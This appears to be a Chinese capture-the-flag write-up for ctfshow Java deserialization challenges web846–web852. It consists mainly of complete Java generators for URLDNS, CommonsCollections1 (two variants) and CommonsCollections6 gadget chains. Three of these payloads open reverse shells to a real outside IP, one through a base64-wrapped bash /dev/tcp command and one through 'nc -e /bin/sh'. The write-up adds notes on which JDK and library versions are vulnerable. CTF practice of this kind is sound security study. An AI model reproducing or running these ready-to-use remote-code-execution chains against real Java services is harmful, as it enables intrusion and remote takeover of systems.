CTFSHOW-java反序列化
web846
题目说明：ctfshow 会对 POST 提交的 ctfshow 参数先做 base64 解码，然后直接反序列化。用 JDK 自带的 URLDNS 链（HashMap + java.net.URL，不依赖任何第三方库）构造一个对当前题目域名的 DNS 查询，查询到达即可获得 flag。
| package com.wea5e1;
import java.io.*; import java.lang.reflect.Field; import java.net.URL; import java.util.Base64; import java.util.HashMap;
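public class ctfshow846 {
    /**
     * Builds the URLDNS gadget for web846 and prints it base64-encoded.
     *
     * <p>The payload is a {@link HashMap} whose only key is a {@link URL}. When the
     * server deserializes it, HashMap re-hashes every key, and computing the URL's
     * hash resolves its hostname - that DNS query is what the challenge checks for.
     * Only JDK classes are involved, so the target needs no extra library; the chain
     * cannot execute code, it only produces an out-of-band lookup.
     *
     * @param args unused
     * @throws Exception on reflection or serialization failure
     */
    public static void main(String[] args) throws Exception {
        // Hostname of the challenge instance - the DNS query must be for this name.
        URL target = new URL("https://b3f77a0b-169e-4e71-bf88-42040c3a87d7.challenge.ctf.show/");

        // URL caches its hash in a private 'hashCode' field and only (re)computes it -
        // resolving the host on the way - while that field holds -1. Both the put()
        // below and the victim's deserialization go through URL.hashCode(), so the
        // field's value decides *where* the lookup fires.
        Field cachedHash = URL.class.getDeclaredField("hashCode");
        cachedHash.setAccessible(true);

        // 1) Pretend the hash is already known so put() does not resolve the host
        //    from the attacker's machine (that would burn the out-of-band signal early).
        cachedHash.set(target, 1);
        HashMap<URL, Integer> gadget = new HashMap<>();
        gadget.put(target, 1);

        // 2) Reset to -1 right before serializing so the serialized URL carries
        //    "not computed" and the victim's rehash performs the real lookup.
        cachedHash.set(target, -1);

        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        // try-with-resources closes (and so flushes) the object stream before we
        // read the buffer; the original never closed it.
        try (ObjectOutputStream out = new ObjectOutputStream(bytes)) {
            out.writeObject(gadget);
        }

        String payload = Base64.getEncoder().encodeToString(bytes.toByteArray());
        System.out.println(payload);
    }
}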
然后把输出的 base64 字符串整体做一次 URL 编码（base64 里的 +、/、= 直接放进表单会被破坏），再作为 ctfshow 参数 POST 即可。
web847
| package org.example.CommonsCollections;
import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.map.TransformedMap;
import java.io.*; import java.lang.annotation.Target; import java.lang.reflect.Constructor; import java.util.Base64; import java.util.HashMap; import java.util.Map;
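public class show847 {
    /**
     * Command handed to Runtime.exec(): a bash reverse shell, base64-wrapped so the
     * redirection characters survive exec()'s whitespace-only tokenizing.
     */
    private static final String COMMAND =
            "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwMS4yMDEuMTE5LjE1OC8yMzMzIDA+JjE}|{base64,-d}|{bash,-i}";

    /**
     * Builds the CommonsCollections1 (TransformedMap variant) payload for web847
     * and prints it base64-encoded.
     *
     * <p>Chain: AnnotationInvocationHandler.readObject -> Map.Entry.setValue on the
     * TransformedMap -> value transformer (our ChainedTransformer) -> Runtime.exec.
     *
     * @param args unused
     * @throws Exception on reflection or serialization failure
     */
    public static void main(String[] args) throws Exception {
        Transformer chain = new ChainedTransformer(runtimeExecChain(COMMAND));

        // The key has to be the name of a member of the annotation type used below
        // ("value" exists on @Target) - readObject only touches entries whose key
        // names a real member; the String value is deliberately the wrong type.
        HashMap<Object, Object> inner = new HashMap<>();
        inner.put("value", "sometext");
        // Value transformer only (key transformer null): setValue() on an entry of
        // this map runs the chain.
        Map<Object, Object> decorated = TransformedMap.decorate(inner, null, chain);

        // NOTE(review): this chain depends on the old AnnotationInvocationHandler
        // readObject calling setValue on a type-mismatched member; later JDK 8
        // updates rewrote that method, so confirm the target's JDK before relying on it.
        Object payloadObject = newAnnotationInvocationHandler(Target.class, decorated);

        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bytes)) {
            out.writeObject(payloadObject);
        }

        String payload = Base64.getEncoder().encodeToString(bytes.toByteArray());
        System.out.println("Payload 生成成功:");
        System.out.println(payload);
    }

    /**
     * Transformer sequence that evaluates Runtime.getRuntime().exec(command) purely
     * through reflection (Runtime itself is not Serializable, Class is).
     */
    private static Transformer[] runtimeExecChain(String command) {
        return new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{command})
        };
    }

    /**
     * Instantiates the package-private sun.reflect.annotation.AnnotationInvocationHandler
     * with the given annotation type and member map.
     */
    private static Object newAnnotationInvocationHandler(Class<?> annotationType, Map<?, ?> memberValues) throws Exception {
        Class<?> handlerClass = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor<?> ctor = handlerClass.getDeclaredConstructor(Class.class, Map.class);
        ctor.setAccessible(true);
        return ctor.newInstance(annotationType, memberValues);
    }
}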
这是 CC1 的 TransformedMap 版本，直接打即可。注意这条链依赖老版本 JDK 中 AnnotationInvocationHandler.readObject 对 map entry 调用 setValue 的实现，一般认为只在 JDK 8u71 之前可用（以及 commons-collections 3.1–3.2.1），打之前先确认目标的 JDK 版本。
web848
| package org.example;
import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.map.LazyMap;
import java.io.*; import java.lang.annotation.Retention; import java.lang.reflect.Constructor; import java.lang.reflect.InvocationHandler; import java.lang.reflect.Proxy; import java.util.Base64; import java.util.HashMap; import java.util.Map;
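public class CommonsCollections11 {
    /**
     * Command handed to Runtime.exec(): a bash reverse shell, base64-wrapped so the
     * redirection characters survive exec()'s whitespace-only tokenizing.
     */
    private static final String COMMAND =
            "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwMS4yMDEuMTE5LjE1OC8yMzMzIDA+JjE}|{base64,-d}|{bash,-i}";

    /**
     * Builds the CommonsCollections1 LazyMap + dynamic-proxy payload for web848
     * (despite the class name this is a CC1 variant, not "CC11") and prints it
     * base64-encoded.
     *
     * <p>Chain: AnnotationInvocationHandler.readObject -> a method call on the
     * proxied Map -> the inner AnnotationInvocationHandler.invoke -> LazyMap.get
     * -> factory (our ChainedTransformer) -> Runtime.exec.
     *
     * @param args unused
     * @throws Exception on reflection or serialization failure
     */
    public static void main(String[] args) throws Exception {
        Transformer chain = new ChainedTransformer(runtimeExecChain(COMMAND));

        // LazyMap invokes its factory on get() for any key that is absent, so the
        // first lookup of any key on an empty backing map fires the chain.
        Map lazy = LazyMap.decorate(new HashMap(), chain);

        // Inner handler: used as the InvocationHandler of a Map proxy. Method calls
        // on the proxy are routed into the handler, which looks the method name up
        // in its member map - i.e. LazyMap.get(...) - and that triggers the factory.
        InvocationHandler lazyMapHandler = newAnnotationInvocationHandler(Retention.class, lazy);
        Map proxiedMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), new Class[]{Map.class}, lazyMapHandler);

        // Outer handler is the object actually serialized; its readObject calls a
        // method on its member map, which is the proxy above.
        // NOTE(review): relies on the pre-8u71 readObject implementation; confirm
        // the target JDK before using this chain.
        InvocationHandler payloadObject = newAnnotationInvocationHandler(Retention.class, proxiedMap);

        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bytes)) {
            out.writeObject(payloadObject);
        }

        String payload = Base64.getEncoder().encodeToString(bytes.toByteArray());
        System.out.println("Payload 生成成功:");
        System.out.println(payload);
    }

    /**
     * Transformer sequence that evaluates Runtime.getRuntime().exec(command) purely
     * through reflection (Runtime itself is not Serializable, Class is).
     */
    private static Transformer[] runtimeExecChain(String command) {
        return new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec", new Class[]{String.class}, new String[]{command}),
        };
    }

    /**
     * Instantiates the package-private sun.reflect.annotation.AnnotationInvocationHandler
     * with the given annotation type and member map.
     */
    private static InvocationHandler newAnnotationInvocationHandler(Class<?> annotationType, Map<?, ?> memberValues) throws Exception {
        Class<?> handlerClass = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor<?> ctor = handlerClass.getDeclaredConstructor(Class.class, Map.class);
        ctor.setAccessible(true);
        return (InvocationHandler) ctor.newInstance(annotationType, memberValues);
    }
}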
使用的是 CC1 的另一条链（LazyMap + 动态代理版本；类名虽然叫 CommonsCollections11，本质还是 CC1 的 LazyMap 变体），反弹 shell 直接打。JDK / commons-collections 版本限制与上一题相同。
web849&web851&Web852
（本来是冲着 851 去的，因为会 CC6；没想到同一个 payload 把 849、851、852 都打通了。）
| package com.wea5e1;
import org.apache.commons.collections4.Transformer; import org.apache.commons.collections4.functors.ChainedTransformer; import org.apache.commons.collections4.functors.ConstantTransformer; import org.apache.commons.collections4.functors.InvokerTransformer; import org.apache.commons.collections4.keyvalue.TiedMapEntry; import org.apache.commons.collections4.map.LazyMap;
import java.io.*; import java.lang.reflect.Field; import java.util.Base64; import java.util.HashMap; import java.util.Map;
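public class CC_six_4 {
    /** Command handed to Runtime.exec(): a netcat reverse shell (needs an nc build with -e). */
    private static final String COMMAND = "nc 101.201.119.158 2333 -e /bin/sh";

    /**
     * Builds the CommonsCollections6 payload on commons-collections4 (4.0) for
     * web849/851/852 and prints it base64-encoded.
     *
     * <p>Chain: HashMap.readObject re-hashes its keys -> TiedMapEntry.hashCode
     * -> TiedMapEntry.getValue -> LazyMap.get -> factory (our ChainedTransformer)
     * -> Runtime.exec. Unlike CC1 this needs nothing from the JDK's annotation
     * internals, which is why it survives newer JDK 8 updates.
     *
     * @param args unused
     * @throws Exception on reflection or serialization failure
     */
    public static void main(String[] args) throws Exception {
        ChainedTransformer chain = new ChainedTransformer(runtimeExecChain(COMMAND));

        // Start with a harmless placeholder factory so that nothing executes on the
        // attacker's machine while the payload is being assembled.
        HashMap<Object, Object> inner = new HashMap<>();
        Map<Object, Object> lazy = LazyMap.lazyMap(inner, new ConstantTransformer(1));
        TiedMapEntry entry = new TiedMapEntry(lazy, "test");

        // Using the entry as a HashMap key calls TiedMapEntry.hashCode(), which reads
        // getValue() -> lazy.get("test"). The placeholder returns 1 and, as a side
        // effect, LazyMap stores "test" -> 1 in the backing map.
        HashMap<Object, Object> gadget = new HashMap<>();
        gadget.put(entry, "test1");

        // Drop that cached key: if "test" is present when the victim rehashes,
        // LazyMap.get() returns it directly and never consults the factory.
        lazy.remove("test");

        // Only now swap the placeholder for the real chain, through reflection since
        // LazyMap exposes no setter for it. The chain has not run locally at this point.
        Field factory = LazyMap.class.getDeclaredField("factory");
        factory.setAccessible(true);
        factory.set(lazy, chain);

        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        // try-with-resources closes (and so flushes) the object stream before we
        // read the buffer; the original never closed it.
        try (ObjectOutputStream out = new ObjectOutputStream(bytes)) {
            out.writeObject(gadget);
        }

        String payload = Base64.getEncoder().encodeToString(bytes.toByteArray());
        System.out.println(payload);
    }

    /**
     * Transformer sequence that evaluates Runtime.getRuntime().exec(command) purely
     * through reflection (Runtime itself is not Serializable, Class is).
     */
    private static Transformer[] runtimeExecChain(String command) {
        return new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{command})
        };
    }
}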
使用的是 CC6 的链子（commons-collections4 版本），反弹 shell 直接打。注意依赖要用 commons-collections4 的 4.0 版本并导入 org.apache.commons.collections4 包；据我所知 4.1 起 InvokerTransformer 等 functor 默认不再允许反序列化，这条链在更高版本上打不通。
其余题目先留坑，之后补上。